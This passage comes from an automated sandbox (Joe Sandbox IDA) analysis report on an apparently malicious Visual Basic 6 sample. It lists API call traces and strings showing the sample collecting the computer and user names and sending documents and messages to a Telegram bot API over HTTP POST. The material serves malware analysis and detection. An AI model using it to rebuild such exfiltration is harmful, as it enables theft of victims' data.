                                                                                    • __vbaFreeStrList.MSVBVM60(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004175D8), ref: 0041A712
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,004016A6), ref: 0041A71D
                                                                                    • #716.MSVBVM60(?,Microsoft.XMLHTTP,00000000,?,?,?,?,?,?,?,?,?,000000FF), ref: 0041A734
                                                                                    • __vbaVarZero.MSVBVM60(?,Microsoft.XMLHTTP,00000000,?,?,?,?,?,?,?,?,?,000000FF), ref: 0041A742
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A794
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A7A8
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A7BC
                                                                                    • __vbaObjVar.MSVBVM60(?,Open,00000003), ref: 0041A7DA
                                                                                    • __vbaLateMemCall.MSVBVM60(00000000,?,Open,00000003), ref: 0041A7E0
                                                                                    • __vbaStrCat.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A80A
                                                                                    • __vbaChkstk.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A81C
                                                                                    • __vbaChkstk.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A830
                                                                                    • __vbaObjVar.MSVBVM60(?,SetRequestHeader,00000002,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A84B
                                                                                    • __vbaLateMemCall.MSVBVM60(00000000,?,SetRequestHeader,00000002,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A851
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041A85C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,00000708), ref: 0041A8A3
                                                                                    • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,00416924,00000708), ref: 0041A8DD
                                                                                    • __vbaObjVar.MSVBVM60(?,Send,00000001), ref: 0041A8F8
                                                                                    • __vbaLateMemCall.MSVBVM60(00000000,?,Send,00000001), ref: 0041A8FE
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041A909
                                                                                    • __vbaVarLateMemCallLd.MSVBVM60(00002011,?,ResponseText,00000000), ref: 0041A935
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041A93E
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041A948
                                                                                    • __vbaFreeVar.MSVBVM60(00000000), ref: 0041A950
                                                                                    • __vbaFreeVar.MSVBVM60(0041A9F4), ref: 0041A9CD
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,0041A9F4,0041A9F4), ref: 0041A9DB
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00000000,0041A9F4,0041A9F4), ref: 0041A9E6
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,00000000,0041A9F4,0041A9F4), ref: 0041A9EE
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF), ref: 0041AA1B
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,?,004016A6), ref: 0041AA3C
                                                                                    • #717.MSVBVM60(?,00004008,00000080,00000000), ref: 0041AA7C
                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,00004008,00000080,00000000), ref: 0041AA89
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041AA96
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041AA9E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$Chkstk$CallLate$#570#717DestructErrorFile$#631#648#709#716CheckCloseHresultListOpenOverflowOwner3RedimVar2Zero
                                                                                    • String ID: 3fbd04f5-b1ed-4060-99b9-fca7ff59c113$Content-Disposition: form-data; name="document"; filename="$Content-Type$Content-Type: application/octet-stream$Microsoft.XMLHTTP$Open$POST$ResponseText$Send$SetRequestHeader$multipart/form-data; boundary=
                                                                                    • API String ID: 4222018757-2892837455
                                                                                    • Opcode ID: b6faac7f32e4b666445206824952df880dc75c7e783993431d8fe6683cbf186b
                                                                                    • Instruction ID: f5a44d5713a457a5f6a0709c5bc5f85fc92455a6486fe3938b3513bff18aa3db
                                                                                    • Opcode Fuzzy Hash: b6faac7f32e4b666445206824952df880dc75c7e783993431d8fe6683cbf186b
                                                                                    • Instruction Fuzzy Hash: F0F12172D40208ABDB11EFA1CC46BDE7BB9AF04704F20816BF504B71A1EB795A858F65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 00419AB8
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 00419AE5
                                                                                    • __vbaStrCopy.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 00419AF2
                                                                                      • Part of subcall function 0041ACF6: __vbaChkstk.MSVBVM60(00000000,004016A6,?,00000015,004016A6,00000001), ref: 0041AD12
                                                                                      • Part of subcall function 0041ACF6: __vbaLenBstr.MSVBVM60(004014C0,?,?,?,00000000,004016A6), ref: 0041AD29
                                                                                      • Part of subcall function 0041ACF6: #632.MSVBVM60(?,00004008,00000001,00000002), ref: 0041ADA0
                                                                                      • Part of subcall function 0041ACF6: __vbaVarCat.MSVBVM60(?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADB4
                                                                                      • Part of subcall function 0041ACF6: __vbaI4ErrVar.MSVBVM60(00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADBA
                                                                                      • Part of subcall function 0041ACF6: #537.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADC0
                                                                                      • Part of subcall function 0041ACF6: __vbaStrMove.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADCA
                                                                                      • Part of subcall function 0041ACF6: __vbaStrCat.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADD0
                                                                                      • Part of subcall function 0041ACF6: __vbaStrMove.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADDA
                                                                                      • Part of subcall function 0041ACF6: __vbaFreeStr.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADE2
                                                                                      • Part of subcall function 0041ACF6: __vbaFreeVarList.MSVBVM60(00000004,00000002,?,?,?,00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADF9
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001,?,?,?,?,004016A6), ref: 00419B05
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000001,?,?,?,?,004016A6), ref: 00419B12
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419B2D
                                                                                      • Part of subcall function 0041AE58: __vbaChkstk.MSVBVM60(00000000,004016A6), ref: 0041AE74
                                                                                      • Part of subcall function 0041AE58: __vbaLenBstr.MSVBVM60(004014D0,?,?,?,00000000,004016A6), ref: 0041AE8B
                                                                                      • Part of subcall function 0041AE58: #631.MSVBVM60(004014D0,00000001,00000002), ref: 0041AED8
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(004014D0,00000001,00000002), ref: 0041AEE2
                                                                                      • Part of subcall function 0041AE58: #516.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEE8
                                                                                      • Part of subcall function 0041AE58: __vbaFreeStr.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEF4
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVar.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEFC
                                                                                      • Part of subcall function 0041AE58: __vbaLenBstr.MSVBVM60(?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF18
                                                                                      • Part of subcall function 0041AE58: #631.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF34
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF3E
                                                                                      • Part of subcall function 0041AE58: #516.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF44
                                                                                      • Part of subcall function 0041AE58: __vbaFreeStr.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF50
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVar.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF58
                                                                                      • Part of subcall function 0041AE58: #608.MSVBVM60(00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF7A
                                                                                      • Part of subcall function 0041AE58: __vbaVarAdd.MSVBVM60(?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF8B
                                                                                      • Part of subcall function 0041AE58: __vbaStrVarMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF91
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF9B
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0), ref: 0041AFAA
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 00419B44
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000,?,?), ref: 00419B5B
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004016A6), ref: 00419B6B
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,004016A6), ref: 00419B7E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004016A6), ref: 00419B8B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419BA6
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 00419BBD
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000,?,?), ref: 00419BD4
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,?,?,?,?,?,?,?,?,?,004016A6), ref: 00419BE6
                                                                                    • __vbaStrCat.MSVBVM60(:::,004013A8,0041720C,00000000,?,?,?,?,?,?,?,?,?,004016A6), ref: 00419BFD
                                                                                    • __vbaVarDup.MSVBVM60 ref: 00419C2C
                                                                                    • #666.MSVBVM60(?,?), ref: 00419C39
                                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00419C72
                                                                                    • #666.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 00419C85
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00419CD9
                                                                                    • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,?,00000008), ref: 00419CED
                                                                                    • __vbaVarAdd.MSVBVM60(?,00000008,?,00000000,?,00000008,00000000,?,?,00000008), ref: 00419D08
                                                                                    • __vbaVarAdd.MSVBVM60(?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000,?,?,00000008), ref: 00419D1C
                                                                                    • __vbaVarAdd.MSVBVM60(?,00000008,00000000,?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000,?,?,00000008), ref: 00419D30
                                                                                    • __vbaVarCat.MSVBVM60(?,00000000,?,00000008,00000000,?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000,?), ref: 00419D3D
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,00000000,?,00000008,00000000,?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000), ref: 00419D43
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000000,?,00000008,00000000,?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000), ref: 00419D4D
                                                                                    • __vbaFreeVarList.MSVBVM60(0000000B,?,00000008,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00419D9B
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00416924,00000700), ref: 00419DE9
                                                                                    • #645.MSVBVM60(00004008,00000000), ref: 00419E24
                                                                                    • __vbaStrMove.MSVBVM60(00004008,00000000), ref: 00419E2E
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,00004008,00000000), ref: 00419E39
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,00000000,00004008,00000000), ref: 00419E50
                                                                                    • __vbaStrCat.MSVBVM60(:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419E6E
                                                                                    • __vbaVarDup.MSVBVM60(:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419E9D
                                                                                    • #666.MSVBVM60(?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419EAA
                                                                                    • __vbaVarDup.MSVBVM60(?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419EE3
                                                                                    • #666.MSVBVM60(?,?,?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419EF6
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419F0D
                                                                                    • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,?,00000008,?,?,?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419F21
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000000,?,00000008,00000000,?,?,00000008,?,?,?,?,:::,004013A8,0041720C), ref: 00419F35
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,?,00000000,?,00000008,00000000,?,?,00000008,?,?,?,?,:::,004013A8), ref: 00419F3B
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,00000008,00000000,?,?,00000008,?,?,?,?,:::,004013A8), ref: 00419F45
                                                                                    • __vbaFreeVarList.MSVBVM60(00000008,?,00000008,?,?,?,?,?,?,00000000,?,?,00000000,?,00000008,00000000), ref: 00419F7E
                                                                                    • __vbaStrCat.MSVBVM60(?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000,?,?,?,?,?), ref: 00419F8E
                                                                                    • __vbaStrMove.MSVBVM60(?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000,?,?,?,?,?), ref: 00419F98
                                                                                    • __vbaStrCat.MSVBVM60(/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000), ref: 00419FA3
                                                                                    • __vbaStrMove.MSVBVM60(/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000), ref: 00419FAD
                                                                                    • __vbaStrCat.MSVBVM60(0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000), ref: 00419FB6
                                                                                    • __vbaStrMove.MSVBVM60(0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000), ref: 00419FC0
                                                                                    • __vbaStrCat.MSVBVM60(&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C), ref: 00419FCB
                                                                                    • __vbaStrMove.MSVBVM60(&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C), ref: 00419FD5
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot), ref: 00419FDE
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot), ref: 00419FE8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot), ref: 00419FFF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00416924,00000704), ref: 0041A044
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,?), ref: 0041A060
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,?), ref: 0041A077
                                                                                    • #529.MSVBVM60(00004008,0041720C,?), ref: 0041A0A1
                                                                                    • __vbaExitProc.MSVBVM60(0041720C,00000000,00004008,00000000), ref: 0041A0B2
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A12D
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A135
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A13D
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A145
                                                                                    • __vbaFreeVar.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A14D
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A155
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A15D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$List$#666Copy$BstrChkstk$#516#631CheckHresult$#529#537#608#632#645ErrorExitProc
                                                                                    • String ID: &caption=$/sendDocument?chat_id=$7864417F664D41787674$78654378674B467A7379712C2C320509512500391E00380A202979645F3C5D01293B7C38467F062E353C03340D3C$:::$COMPUTERNAME$USERNAME$https://api.telegram.org/bot$rMPwNUypMEMKmmtbHhJrrpIrRFLHRjvoNh
                                                                                    • API String ID: 15591791-2155216444
                                                                                    • Opcode ID: a1dc16fa56941c0d947b16ba45f1b68b0c0ca5286762a38d37cfc0d4cab64067
                                                                                    • Instruction ID: 791649ec814abe3afb33174353489d42ad3a99337645dca8d9169580b313dfd7
                                                                                    • Opcode Fuzzy Hash: a1dc16fa56941c0d947b16ba45f1b68b0c0ca5286762a38d37cfc0d4cab64067
                                                                                    • Instruction Fuzzy Hash: 76028C7690011C9BDB51EBA1CC81BDEB7B8AF08304F5081ABF509B7151EF789B898F95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041A1AA
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 0041A1D7
                                                                                    • __vbaStrCat.MSVBVM60(00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A1E6
                                                                                    • __vbaStrMove.MSVBVM60(00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A1F0
                                                                                    • __vbaStrCat.MSVBVM60(/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A1FB
                                                                                    • __vbaStrMove.MSVBVM60(/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A205
                                                                                    • __vbaStrCat.MSVBVM60(004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A210
                                                                                    • __vbaStrMove.MSVBVM60(004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A21A
                                                                                    • __vbaStrCat.MSVBVM60(&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A225
                                                                                    • __vbaStrMove.MSVBVM60(&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A22F
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A23A
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A244
                                                                                    • __vbaStrCat.MSVBVM60(&caption=,00000000,?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001), ref: 0041A24F
                                                                                    • __vbaStrMove.MSVBVM60(&caption=,00000000,?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001), ref: 0041A259
                                                                                    • __vbaStrCat.MSVBVM60(004016A6,00000000,&caption=,00000000,?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001), ref: 0041A264
                                                                                    • __vbaStrMove.MSVBVM60(004016A6,00000000,&caption=,00000000,?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001), ref: 0041A26E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,00000000,00000000,?,00000000,004013D0,004016A6,00000000,&caption=,00000000,?,00000000,&text=,00000000,004013D0), ref: 0041A28D
                                                                                    • #716.MSVBVM60(?,Msxml2.XMLHTTP,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A2A0
                                                                                    • __vbaObjVar.MSVBVM60(?,?,Msxml2.XMLHTTP,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A2A9
                                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Msxml2.XMLHTTP,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A2B3
                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000,?,?,Msxml2.XMLHTTP,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A2BB
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A2F2
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A303
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A317
                                                                                    • __vbaLateMemCall.MSVBVM60(?,Open,00000003), ref: 0041A332
                                                                                    • __vbaLateMemCall.MSVBVM60(?,Send,00000000), ref: 0041A344
                                                                                    • __vbaLateMemCallLd.MSVBVM60(?,?,ResponseText,00000000), ref: 0041A35A
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041A363
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041A36D
                                                                                    • __vbaFreeVar.MSVBVM60(00000000), ref: 0041A375
                                                                                    • __vbaExitProc.MSVBVM60(00000000), ref: 0041A386
                                                                                    • __vbaFreeStr.MSVBVM60(0041A3D6,00000000), ref: 0041A3C0
                                                                                    • __vbaFreeObj.MSVBVM60(0041A3D6,00000000), ref: 0041A3C8
                                                                                    • __vbaFreeStr.MSVBVM60(0041A3D6,00000000), ref: 0041A3D0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$Chkstk$CallLate$#716AddrefErrorExitListProc
                                                                                    • String ID: &caption=$&text=$/sendMessage?chat_id=$Msxml2.XMLHTTP$Open$POST$ResponseText$Send$https://api.telegram.org/bot
                                                                                    • API String ID: 1207767827-2853864815
                                                                                    • Opcode ID: fc367c3047c0605dc103778644140bca654d6cfbfe7707eac74a5f851dacdf86
                                                                                    • Instruction ID: 5764d51b8fd5494b8e533a0d281c9d12e1aca88c51fe61a14bcd4e9312e3205c
                                                                                    • Opcode Fuzzy Hash: fc367c3047c0605dc103778644140bca654d6cfbfe7707eac74a5f851dacdf86
                                                                                    • Instruction Fuzzy Hash: DB513F72D00108ABDB01FFA5DD42BDE77B9AF04704F60803BF501BB1A2EB795A458B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,004015D8,?,00000002,?,?,004016A6), ref: 0041B5E9
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B619
                                                                                    • __vbaUbound.MSVBVM60(00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B62C
                                                                                    • __vbaLbound.MSVBVM60(00000001,?,00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B63A
                                                                                    • __vbaErrorOverflow.MSVBVM60(00000001,?,00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B65F
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041B680
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000002,?,?,004016A6), ref: 0041B69A
                                                                                    • __vbaI2I4.MSVBVM60(004015D8,?,00000000,?,00000000,004016A6), ref: 0041B6B2
                                                                                    • __vbaDerefAry1.MSVBVM60(004015D8,00000000), ref: 0041B6EE
                                                                                    • __vbaDerefAry1.MSVBVM60(004015D8,00000000,004015D8,00000000), ref: 0041B711
                                                                                    • #608.MSVBVM60(?,?,004015D8,00000000,004015D8,00000000), ref: 0041B71E
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B72F
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B735
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B73F
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B74E
                                                                                    • __vbaStrCopy.MSVBVM60(004015D8,00000000), ref: 0041B765
                                                                                    • __vbaFreeStr.MSVBVM60(0041B79F), ref: 0041B799
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Ary1ChkstkCopyDerefErrorFreeMove$#608LboundListOverflowUbound
                                                                                    • String ID:
                                                                                    • API String ID: 2742792845-0
                                                                                    • Opcode ID: 933fd5c5f8b2a3423e0ed97259365dad75bd5c53feb0989c152de9d692c0184e
                                                                                    • Instruction ID: 5ecf3bcae577b24d721472dbb689d0e8a8752152ae06bcdc95a92d97a5ef9859
